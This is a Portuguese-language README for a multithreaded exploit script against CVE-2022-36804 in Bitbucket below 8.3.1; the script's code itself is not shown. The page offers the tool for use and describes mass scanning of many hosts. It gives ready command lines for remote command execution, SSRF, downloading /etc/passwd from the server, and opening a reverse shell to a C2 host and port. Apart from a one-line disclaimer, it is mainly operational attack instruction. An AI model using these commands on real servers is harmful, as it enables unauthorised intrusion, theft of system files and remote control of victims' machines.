
Script de exploit multithread para CVE-2022-36804 que afeta versões do BitBucket <8.3.1
Script de exploração multithread para CVE-2022-36804 afetando (a maioria das) versões do BitBucket <8.3.1 Veja o advisory completo aqui https://jira.atlassian.com/browse/BSERV-13438
Todo o crédito a TheGrandPew pela descoberta
O script detectará automaticamente repositórios públicos localizados em instâncias do Bitbucket e, em seguida, selecionará um repositório aleatório para verificar ou executar a vulnerabilidade. Se não houver repositórios públicos, um cookie 'BITBUCKETSESSIONID' válido é necessário para explorar instâncias vulneráveis conhecidas.
O PoC foi projetado para receber múltiplos hosts de entrada e enviar via pipe os hosts vulneráveis para o stdout, permitindo o encaminhamento dos resultados para serem processados por outras ferramentas.
Não use para fins maliciosos.
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
[--skip-check] [-t THREADS] [-v]
repos [repos ...]
CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1
optional arguments:
-h, --help show this help message and exit
required arguments:
repos Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on
optional arguments:
--auth-cookie AUTH_COOKIE
Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
--proxy PROXY HTTP Proxy: <http/https>://<ip>:<port>
-e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
Exploit to perform
--cmd CMD Command to execute for the 'rce' exploit (curl http://example.com)
--knary KNARY Knary to respond too via DNS for the 'ssrf' exploit
--server-file SERVER_FILE
Server file to download for the 'download' exploit (/etc/passwd)
--host HOST Hostname or IP address of c2 for the 'rev_shell' exploit
--port PORT Port of the c2 for the 'rev_shell' exploit
--skip-check Skip vulnerability checking stage
-t THREADS, --threads THREADS
Worker Threads
-v, --verbose Increase output verbosity level
Host único
CVE-2022-36804.py http://bitbucket.local:7990/Vários hosts e envio via pipe de hosts vulneráveis e repositórios explorados para um arquivo
CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/
Execute uma solicitação DNS para o knary especificado
CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/
Baixa um repositório com o arquivo alvo
/etc/passwd, salvando o repositório compactado em um nome de arquivo aleatório.
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/